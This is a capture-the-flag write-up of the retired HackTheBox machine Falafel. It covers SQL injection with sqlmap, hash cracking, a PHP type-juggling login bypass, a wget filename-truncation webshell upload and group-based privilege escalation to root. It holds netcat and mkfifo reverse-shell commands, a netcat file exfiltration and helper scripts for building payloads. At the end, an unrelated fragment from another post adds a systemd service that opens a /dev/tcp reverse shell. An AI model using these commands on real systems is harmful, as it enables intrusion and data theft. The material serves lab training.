
HackTheBox - Falafel - Retired









Recon

Let's use threader3000 for our recon scan. It's a threaded port scanner written in Python that does a quick open/closed sweep of all TCP ports, then suggests an nmap command based on the results. It saves the nmap output as XML, which we can then convert to HTML with xsltproc:



xsltproc falafel.htb/falafel.htb.xml -o ./falafel.html





Not a whole lot to go on here, just ports 80 and 22. nmap thinks it's a Linux (Ubuntu) box.




Port Service Version
22 OpenSSH 7.2p2
80 Apache HTTPD 2.4.18





On most HackTheBox machines port 22 (SSH) is just the way in once you have credentials, not the attack path itself, so let's check out port 80 and see what we see.



Falafellovers


There is just this page and a login page




Nmap said there was a robots.txt file too, let's check it out.


User-agent: *
Disallow: /*.txt




You don't want to index .txt files huh?


That really makes me want to look for .txt files.


dirb http://falafel.htb -X .txt


-X with dirb lets you specify an extension (or a list of extensions) to append to every word in the wordlist.



Well it only found the robots.txt file we already knew about.


Weird... why would robots.txt exist just to hide robots.txt? Let's try a bigger wordlist and see if anything else turns up.



dirb http://falafel.htb /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -X .txt





Cyberlaw.txt?







Hmmm this note is interesting….


A user named Chris has alerted the admin that they can log in as admin without knowing the password (sounds like SQL injection to me). They also say they can abuse an image upload feature to take control of the website.



Running dirb with default options shows a couple of different folders



Most of them we don't have access to, yet


/uploads looks like it's pretty promising.


Let's pivot to the login page.


Let's try admin/admin for a login.


We get this interesting response from the server.




Wrong identification: admin


Is this leaking that admin is a valid login but just the wrong password?


Let's add some random gibberish to the end of admin for the username to see if we get a different response.


admin9646846589



It does: for non-existent users we get "Try again..", but for valid users we get the "Wrong identification" error. That is a username enumeration bug in its own right; a login page should return the same message for both cases.


So we know that admin is a valid username. Let's capture that login again in Burp Suite to see if we can get any more info.





POST /login.php HTTP/1.1
Host: falafel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://falafel.htb
Connection: close
Referer: http://falafel.htb/login.php
Cookie: PHPSESSID=f3f1b976svephi21i6525btpn6
Upgrade-Insecure-Requests: 1

username=admin&password=admin






Exploit


Since we suspect SQL injection here, let's save this request out to a file called request.txt.


If we just run sqlmap with its defaults it reports that the parameter might not be injectable, but we are fairly sure it is. The problem is that a failed login and a false injected condition both come back as a generic error page, so sqlmap has nothing to tell true from false. The --string option gives it that: it tells sqlmap which text appears in the response when the injected condition is true, which for a known account is the "Wrong identification" message we saw above.


Here is a great little site which you can use to learn more about sqlmap


https://hackertarget.com/sqlmap-tutorial/




sqlmap --level=5 --risk=3 -p username -r ./request.txt --string "Wrong identification : admin"








Now sqlmap can detect the vulnerability here.


Now we can run the same command and add --tables to enumerate the tables in every database.


Here we can see two databases:



information_schema (MySQL's built-in metadata database) and a database named falafel.


Let's look at the falafel database specifically, using -D to restrict sqlmap to it:


sqlmap --level=5 --risk=3 -p username -r ./request.txt --string "Wrong identification : admin" -D falafel --tables








A table named users. Let's dump the contents of that table.


By adding --dump:


sqlmap --level=5 --risk=3 -p username -r ./request.txt --string "Wrong identification : admin" -D falafel --tables --dump





Looks like we have two user accounts: a normal user named chris (the guy who alerted the admin to the SQLi) and the admin, along with their password hashes.


Let's use hashid to try and figure out what type of hash this is



It could be an MD5. Let's use hashcat to try and break it.


-m 0 is the hashcat mode for a raw MD5 hash:


hashcat -m 0 d4ee02a22fc872e36d9e3751ba72ddc8 /usr/share/wordlists/rockyou.txt








Looks like Chris' password is juggling.




And we are now able to login as chris


I was hoping to see an upload area here, but I don't see anything… Obviously chris was able to put this in here, so there has to be a way to upload data…




Not seeing a super obvious path here, why are they talking about juggling?


Let's google "juggling pentest" to see if there is some path we don't know about yet.




The first result is on owasp


https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf


Which talks about Type Juggling.


Say a developer needs to compare the contents of two variables of different types, for example an integer and a string.


PHP does not complain. Behind the scenes the loose comparison operator (==) converts both operands to a common type so it can compare them, so a string that looks like a number gets turned into a number. That means two strings that are different byte-for-byte can still be "equal" if both parse to the same numeric value. This is documented much better than I can explain it in the link above, so check it out.


Following down the rabbit holes that we do when researching new techniques you might stumble across something called magic hashes…..


https://www.whitehatsec.com/blog/magic-hashes/



These are inputs whose MD5 digest happens to be of the form 0e followed only by digits. PHP treats such a string as a number in scientific notation (zero times ten to some power, which is zero), so if the stored hash is also of that form, md5($password) == $stored_hash is true even though the two digests are completely different.


So the value of 


240610708


Has a md5 hash of


0e462097431906509019562988736854



Maybe we can use this to attack the admin account, which hopefully has access to the upload.php we found earlier.
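To make the comparison concrete, here is an added Python example (not code from the original post or from the Falafel box) that mimics PHP's loose == on two strings and shows why a magic password gets past a check written as md5($password) == $hash, while the same input fails a strict === check. The 240610708 value and its digest are the ones quoted above; the stored admin hash is a constructed stand-in derived from the well-known magic input QNKCDZO, because the real admin hash is not shown in this post.

```python
import hashlib
import re

# PHP calls a string "numeric" when it looks like an int or float literal,
# optionally with an exponent. "0e462097..." is 0 x 10^462097..., i.e. 0.0.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Mimic PHP's == for two strings: if both are numeric strings they are
    compared as numbers (PHP 5 through 8 all do this for string vs string)."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """Mimic PHP's ===: same type and same bytes, no conversion at all."""
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(h: str) -> bool:
    """A 'magic' MD5 is a hex digest of the form 0e<digits only>: it is a
    numeric string whose value is zero, so it loosely equals any other one."""
    return re.fullmatch(r"0e\d+", h) is not None


def login_ok(stored_hash: str, password: str, strict: bool) -> bool:
    """The vulnerable check (strict=False, PHP ==) next to the fixed one
    (strict=True, PHP ===; hash_equals() or password_verify() in real code)."""
    candidate = md5_hex(password)
    if strict:
        return php_strict_eq(candidate, stored_hash)
    return php_loose_eq(candidate, stored_hash)


# Constructed stand-in for the admin row: the post does not print the real
# admin hash, so this one is derived from the classic magic input "QNKCDZO".
STORED_ADMIN_HASH = md5_hex("QNKCDZO")

if __name__ == "__main__":
    for pw in ("240610708", "QNKCDZO", "password"):
        h = md5_hex(pw)
        print(f"{pw:>10} -> {h}  magic={is_magic_hash(h)}  "
              f"loose_login={login_ok(STORED_ADMIN_HASH, pw, strict=False)}  "
              f"strict_login={login_ok(STORED_ADMIN_HASH, pw, strict=True)}")
```

Only the loose comparison lets 240610708 in; with === only the exact digest matches. The fix on the application side is to never compare hashes with == and, better, to drop unsalted MD5 for password_hash()/password_verify().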



So on the login screen if we do


admin
240610708










Great, that worked. We now have access to the upload feature, which fetches files by URL. We found the /uploads/ folder earlier in our enumeration, which we assume will be the landing place for whatever we upload here; let's test that out first.




Let's serve up a png file using updog and see if it works.


First let's start updog in a directory that contains a PNG file (I grabbed a copy of the HTB logo for testing):


updog




Then we just need to tell the upload page where we are hosting it from



http://10.10.14.15:9090/HTB.png


Then we click upload and see this 





Upload via url:
Upload Succsesful!
Output:
CMD: cd /var/www/html/uploads/1027-1853_4ffebf20a38154c7; wget 'http://10.10.14.15:9090/HTB.png'
--2020-10-27 18:53:02--  http://10.10.14.15:9090/HTB.png
Connecting to 10.10.14.15:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4577 (4.5K) [image/png]
Saving to: 'HTB.png'

    0K ....                                                  100%  425M=0s

2020-10-27 18:53:02 (425 MB/s) - 'HTB.png' saved [4577/4577]




That is far more information than an upload page should disclose.


We now know that the server runs wget to download the file into a per-upload directory under /var/www/html/uploads, and it even prints the directory name and the full command line back to us.


And if we try to browse to http://falafel.htb/uploads/1027-1853_4ffebf20a38154c7/HTB.png


We see the logo that we uploaded.









Cool, so we can upload files. It doesn't rename them… and it tells us where we can find them.


Let's try uploading a php webshell.










It doesn't like it: "Bad Extension".


Now we are up against it. Since this isn't a direct file upload, we can't capture the request in Burp and slip PHP inside a PNG in transit the way we did on Popcorn


https://blog.circusmonkeysecurity.com/2020/09/hackthebox-retired-popcorn-updated.html


Or magic


https://blog.circusmonkeysecurity.com/2020/08/hacktheboxeu-retired-magic.html




Since we know that they are using wget to download the file let's see if we can find a vulnerability for it.


After a google search we might come across this post


http://cerebralmanifest.com/wget-and-long-filenames-vulnerability/#:~:text=On%20many%20linux%20systems%2C%20this,one%20present%20in%20the%20url.



Which basically says that wget will shorten a file name that is too long for the filesystem (the post puts the threshold around 240 characters) rather than fail the download. On its own that is a sensible mitigation, not a vulnerability. Here it matters because the extension check runs on the name in the URL, while the name actually written to disk is the truncated one, and those two can end differently.


Let's give it a shot with my favorite php webshell


https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php




Let's write a little Python script to produce the padding we need. Let's start by going past 240 characters to see whether wget rewrites the file name.




# build a string of 241 'a' characters to push the file name past 240
var = 'a'

for i in range(0, 240):
    var = var + 'a'

print(var)


I renamed the webshell with the a's inserted before the extension and gave this URL to the upload function:


http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png



Upload Succsesful!
Output:
CMD: cd /var/www/html/uploads/1028-1816_7dd36b3fead468cc; wget 'http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png'
The name is too long, 254 chars total.
Trying to shorten...
New name is shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.
--2020-10-28 18:16:00--  http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png
Connecting to 10.10.14.15:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7206 (7.0K) [image/png]
Saving to: 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'

    0K .......                                               100% 8.49M=0.001s

2020-10-28 18:16:01 (8.49 MB/s) - 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' saved [7206/7206]


Specify a URL of an image to upload:





Cool, we can see it shorten the file name (the trailing dot after "New name is ..." is wget's punctuation, not part of the name). The 254-character name was cut down to 236 characters, so maybe we can tune the length so the cut lands right after .php.



A little trial and error gives the exact length that makes wget save our webshell as .php: with a 240-character name the last four characters (.png) are dropped and the file lands on disk ending in .php.


shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png


CMD: cd /var/www/html/uploads/1028-1827_779b1710e370eb78; wget 'http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png'
The name is too long, 240 chars total.
Trying to shorten...
New name is shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.
--2020-10-28 18:27:02--  http://10.10.14.15:9090/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php.png
Connecting to 10.10.14.15:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7206 (7.0K) [image/png]
Saving to: 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php'

    0K .......                                               100%  643M=0s

2020-10-28 18:27:03 (643 MB/s) - 'shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php' saved [7206/7206]
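The trial and error above can be replaced with arithmetic. This is an added Python example, not part of the original post: the log lines "The name is too long", "Trying to shorten..." and "New name is ..." come from wget keeping only the first NAME_MAX minus 19 characters of a file name, which on an ext4 system with NAME_MAX 255 is 236, and the 240-character name above was indeed saved with 236 characters. The function below builds a name that ends in .png in the URL (what the upload page checks) while the truncated on-disk name ends in .php. The "shell" stem and the .php/.png pair are the ones used above; the helper names, and the guess about how the page's extension check works, are mine.

```python
NAME_MAX = 255                         # per-component limit on ext4 (_PC_NAME_MAX)
WGET_HEADROOM = 19                     # wget keeps this much spare for suffixes like ".1"
WGET_KEEP = NAME_MAX - WGET_HEADROOM   # 236: the length wget kept in the log above


def passes_extension_check(url_name: str, allowed=(".png", ".jpg", ".gif")) -> bool:
    """The kind of check the upload page appears to do (the "Bad Extension"
    message): look only at how the name in the URL ends. This is an assumption,
    the page's source is not shown in the post."""
    return url_name.lower().endswith(allowed)


def wget_saved_name(url_name: str, keep: int = WGET_KEEP) -> str:
    """Name wget writes to disk: unchanged if it fits, otherwise the first
    `keep` characters ("Trying to shorten...")."""
    if len(url_name) <= keep:
        return url_name
    return url_name[:keep]


def craft_name(stem: str, want: str = ".php", decoy: str = ".png",
               keep: int = WGET_KEEP, pad_char: str = "a") -> str:
    """Build <stem><padding><want><decoy> so the URL ends in `decoy` but the
    truncated on-disk name ends exactly in `want`."""
    pad = keep - len(stem) - len(want)
    if pad < 0:
        raise ValueError("stem too long for the wanted extension")
    name = stem + pad_char * pad + want + decoy
    # sanity check: truncating at `keep` must land right after `want`
    assert wget_saved_name(name, keep).endswith(want), "truncation point miscalculated"
    return name


if __name__ == "__main__":
    name = craft_name("shell")
    print(len(name), "chars in the URL, passes extension check:",
          passes_extension_check(name))
    print("saved on disk as:", wget_saved_name(name))
```

For the "shell" stem this yields 5 + 227 + 4 + 4 = 240 characters, exactly the length that worked above. On the defensive side, the fix is to decide the on-disk name yourself (a random name plus an extension from an allow-list) rather than letting wget derive it from the URL, and to keep the uploads directory from executing PHP at all.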



So now if we go to


http://falafel.htb/uploads/1028-1827_779b1710e370eb78/shellaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.php



We hopefully see our webshell..








And we can see we are in as www-data



Let's use this to get a proper shell


Let's setup our listener on our kali box first



nc  -lnvp 5555



Then we put this in the command box of our web shell:


nc 10.10.14.15 5555 -e /bin/sh





No -e option with this version of netcat. Fine, let's try the mkfifo variant instead:


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.15 5555 >/tmp/f




And we have our first interactive shell


Poking around in the file system we find this connection.php file.


$ cat connection.php
<?php
  define('DB_SERVER', 'localhost:3306');
  define('DB_USERNAME', 'moshe');
  define('DB_PASSWORD', 'falafelIsReallyTasty');
  define('DB_DATABASE', 'falafel');
  $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
  // Check connection
  if (mysqli_connect_errno())
  {
      echo "Failed to connect to MySQL: " . mysqli_connect_error();
  }
?>



Looks like a db on this machine with a username and password..


Poking around, we don't have access to either user's home folder on the machine, but we now have what might be moshe's password if they reused their login password for the DB.



Let's try to su as moshe.


su moshe



Ok need to upgrade our shell… we can hopefully use python to upgrade it.


$ python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 25: python: not found




Ok what about python3


$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@falafel:/home$ su moshe
su moshe
Password: falafelIsReallyTasty

setterm: $TERM is not defined.
moshe@falafel:/home$ 



Cool now we can get the user.txt file








Now we need to figure out how to escalate….




Let's use our still running updog server to download a copy of linpeas.sh (linux privilege escalation script) to falafel.





Then give the script execution rights


chmod +x ./linpeas.sh



It looks like moshe is a part of a group that we don't normally see in the results.



Moshe is a member of the video group.


And as always, when we see something we aren't familiar with, we google it.



So googling "video group linux pentest"


One of the results is 


https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe



Which says members of this group can read the framebuffer, i.e. whatever is currently drawn on the physical screen. In our case



yossi is currently logged in on the console, and we can grab a dump that should show us the content of their screen.



The framebuffer is exposed as a device node in /dev/.



In there we see a device named fb0 which the video group has read access to.



Let's make a copy into a temporary folder.


cat /dev/fb0 > /tmp/circusmonkey/screen.raw


Then, according to the blog, we need to find the resolution of the framebuffer so we know what dimensions to open the file with:


cat /sys/class/graphics/fb0/virtual_size




moshe@falafel:/dev$ cat /sys/class/graphics/fb0/virtual_size
cat /sys/class/graphics/fb0/virtual_size
1176,885



Now let's use netcat to transfer the file to our kali box


First let's set up a new listener on our kali box


nc -lnvp 5666 > screen.raw

Then we can send the file over with netcat on falafel

nc 10.10.14.15 5666 < /tmp/circusmonkey/screen.raw




The blog says to use GIMP to open the file


If you don't have it on your kali box you can install it with apt


sudo apt-get install gimp



After it is installed and opened. Choose open file


Find screen.raw, then under "Select File Type" choose "Raw Image Data" and open it.



If we set the width to 1176 and height to 885 we can start to see something, If we start trying some different image types we find that RGB565 Big Endian let's us see more clearly
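If you would rather skip GIMP's raw-import dialog, the decode is only a few lines. This is an added Python example, not from the original post: it parses the virtual_size string shown above, interprets the dump as 16-bit RGB565 pixels in the byte order that worked in GIMP (big endian, switchable), and writes a PNG using only the standard library. The width, height and pixel format are taken from the page; the file names and the assumption that each scan line is tightly packed (stride == width * 2) are mine, so if the output looks sheared, check bits_per_pixel and stride in the same /sys/class/graphics/fb0/ directory and adjust.

```python
import struct
import sys
import zlib


def parse_virtual_size(text):
    """Parse the "width,height" string from /sys/class/graphics/fb0/virtual_size."""
    w, h = (int(v) for v in text.strip().split(","))
    return w, h


def rgb565_to_rgb888(raw, width, height, big_endian=True):
    """Expand 2-byte RGB565 pixels (5 red, 6 green, 5 blue bits) to 3-byte RGB.
    Assumes tightly packed rows, i.e. stride == width * 2 (my assumption)."""
    need = width * height * 2
    if len(raw) < need:
        raise ValueError("dump has %d bytes, need %d for %dx%d at 16bpp"
                         % (len(raw), need, width, height))
    fmt = ">H" if big_endian else "<H"
    out = bytearray(width * height * 3)
    i = 0
    for (px,) in struct.iter_unpack(fmt, raw[:need]):
        r = (px >> 11) & 0x1F
        g = (px >> 5) & 0x3F
        b = px & 0x1F
        # scale the 5- and 6-bit channels up to 0..255
        out[i] = (r * 255) // 31
        out[i + 1] = (g * 255) // 63
        out[i + 2] = (b * 255) // 31
        i += 3
    return bytes(out)


def encode_png(width, height, rgb):
    """Minimal 8-bit RGB PNG encoder: one IDAT, filter type 0 on every row."""
    def chunk(tag, data):
        body = tag + data
        return (struct.pack(">I", len(data)) + body
                + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF))

    stride = width * 3
    rows = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    return (b"\x89PNG\r\n\x1a\n"
            + chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0))
            + chunk(b"IDAT", zlib.compress(rows, 9))
            + chunk(b"IEND", b""))


def convert(raw_path, size_text, out_path, big_endian=True):
    """Turn a /dev/fb0 dump into a PNG; returns the (width, height) used."""
    w, h = parse_virtual_size(size_text)
    with open(raw_path, "rb") as f:
        raw = f.read()
    with open(out_path, "wb") as f:
        f.write(encode_png(w, h, rgb565_to_rgb888(raw, w, h, big_endian)))
    return w, h


if __name__ == "__main__":
    # usage: fb2png.py screen.raw "1176,885" screen.png [le]
    raw_path, size_text, out_path = sys.argv[1:4]
    big_endian = len(sys.argv) < 5 or sys.argv[4] != "le"
    w, h = convert(raw_path, size_text, out_path, big_endian)
    print("wrote %dx%d image to %s" % (w, h, out_path))
```

Run it on the screen.raw transferred with netcat and the "1176,885" string from virtual_size; if the colours look inverted or scrambled, try the le flag for little-endian pixels. Either way the result is the same image GIMP shows.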



Here we can see what looks like yossi attempting to change their password to


MoshePlzStopHackingMe!



Let's see if we can ssh in as yossi now


ssh yossi@falafel.htb





Good news, we can.


No flag in the home directory for yossi. Let's run linpeas again as yossi to see if we can find our next step.



This time we see yossi is a member of the disk group... let's google that.

Google "linux disk group privilege escalation"



We found this blog

https://reboare.gitbooks.io/booj-security/content/general-linux/privilege-escalation.html


It basically says members of this group have raw read/write access to the block devices in /dev, such as /dev/sda1, which means the filesystem permissions on the files stored on those disks no longer protect anything.



It mentions a program called debugfs which I'm not familiar with... so guess what we do? We google it.


If we google "debugfs pentest" we find this site  https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host


Which says we can use debugfs to open the raw ext filesystem directly and use ls, cd, cat and so on to read any file on it, regardless of who owns it.



So let's give it a try


debugfs /dev/sda1




The output looks alot like the list of the system files.


2  (12) .    2  (12) ..    11  (20) lost+found    131073  (12) etc  
262145  (16) media    131075  (12) bin    262146  (12) boot  
262147  (12) dev    12  (12) home    13  (12) lib    262236  (16) lib64  
262238  (12) mnt    262239  (12) opt    262240  (12) proc  
262241  (12) root    262244  (12) run    262257  (12) sbin  
262370  (12) srv    262371  (12) sys    262372  (12) tmp    262373  (12) usr  
131762  (12) var    24441  (20) initrd.img    24442  (40) vmlinuz  
145141  (12) snap    44536  (24) initrd.img.old    15692  (3720) vmlinuz.old   


So now we can cd /root inside debugfs.


Now if we ls again


262241  (12) .    2  (12) ..    262242  (16) .bashrc  
262243  (16) .profile    295046  (16) .cache    289943  (16) root.txt  
269128  (16) .nano    402797  (12) .ssh    269130  (52) .wget-hsts  
269127  (3928) .bash_history  
(END)


Hopefully we can just cat out the root.txt file now


debugfs:  cat root.txt
23b7**********************************


That is good and all but we want to get a real shell on this guy..


Let's see if there is anything in the /root folder that might help us out.


262241  (12) .    2  (12) ..    262242  (16) .bashrc  
262243  (16) .profile    295046  (16) .cache    289943  (16) root.txt  
269128  (16) .nano    402797  (12) .ssh    269130  (52) .wget-hsts  
269127  (3928) .bash_history   



Look, there is a .ssh folder, maybe we can find root's private key in there.


cd .ssh



402797  (12) .    262241  (12) ..    402812  (16) id_rsa  
402822  (40) id_rsa.pub    402824  (4016) authorized_keys   

Looks like there is a file name id_rsa, id_rsa.pub and authorized keys.


If we look at id_rsa.


debugfs:  cat id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----




That looks like it might be a private key. Let's copy the contents to a file on our kali box and name it id_rsa


After we have it saved, we need to change the permissions on the file or else ssh will complain that the permissions are too open and ignore the key:


chmod 600 ./id_rsa

Now we can try to log in as root with this key


ssh -i ./id_rsa root@falafel.htb



And then




We are in as root.


Fun.









Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The